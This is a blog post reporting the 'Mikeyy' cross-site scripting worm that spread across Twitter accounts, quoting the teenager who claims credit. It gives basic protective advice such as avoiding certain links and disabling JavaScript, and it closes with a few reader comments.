Twitter Web Worm Causes Havoc
Update: Apparently a bunch of variant worms are doing the rounds that circumvent Twitter’s recent patch to fix the problem. I’d be cautious using Twitter over the next couple weeks, see protection guidelines below or at this link.
Teen exploits Twitter
A 17 year-old has claimed credit for releasing a Cross Site Scripting worm that infected hundreds of accounts over the long weekend:
Brooklyn resident Michael “Mikeyy” Mooney, 17, told CNET News in an interview that he created the worm “out of boredom.”
“I thought about it later and basically did it because I was bored,” he said. “And I didn’t think Twitter would fix (the flaw) very soon. But I didn’t think it would spread as far or as fast as it did.”
Well it looks like we can add this to our recent Twiiter vulnerability history post.
It looks like Twitter are going to try press charges against the teen. This sounds like a very similar case to the samy worm that hit Myspace.
Although, the worm itself did nothing (merely proof of concept), it could have easily compromised every account holder infected. Nasty indeed!
I think the danger of Cross Site Scripting vulnerabilities is the lack of skill required to discover and exploit these holes. This vulnerability type is a prime market for future web 2.0 worms which threaten sites like Twitter, Myspace, Facebook, Linkedin and others.
Keeping safe from worm
First of all, experts advise Twitter users not to click on any links from messages containing the words “Mikeyy” or “Stalkdaily.” It is recommended you use third-party Twitter desktop clients like Twhirl or TweetDeck (both PC and Mac) and that you do not use the Web-based version of Twitter, especially for viewing user profiles (as this is where the attack seems to originate).
As an additional security measure, you can disable JavaScript in your browser. Firefox users can use the no-script add-on, which stops any unwanted scripts from running.
Random Posts
If you enjoyed this post, please leave a comment or subscribe to the feed and get future articles delivered to your feed reader.
Comments
Oops ran out of space. I’ll start where I left off: …-lation after texting ’stop’. Ps I only came here to remove email updates but can’t find a link with my mobile browser. Starting to worry about state of web esp for mobile users.
Had nothing better to do, what a jerk. I’m not a Twitter user however I know many people who do use it so I stumbled the article. Hopefully, people will find this so they can be aware.
Thanks for the heads up.
I would also advise people not to sign up to Twitter’s sms service. I did at the weekend and what fun it proved… 500 ‘confirmation messages’ interspersed with 500 confirmation of cancel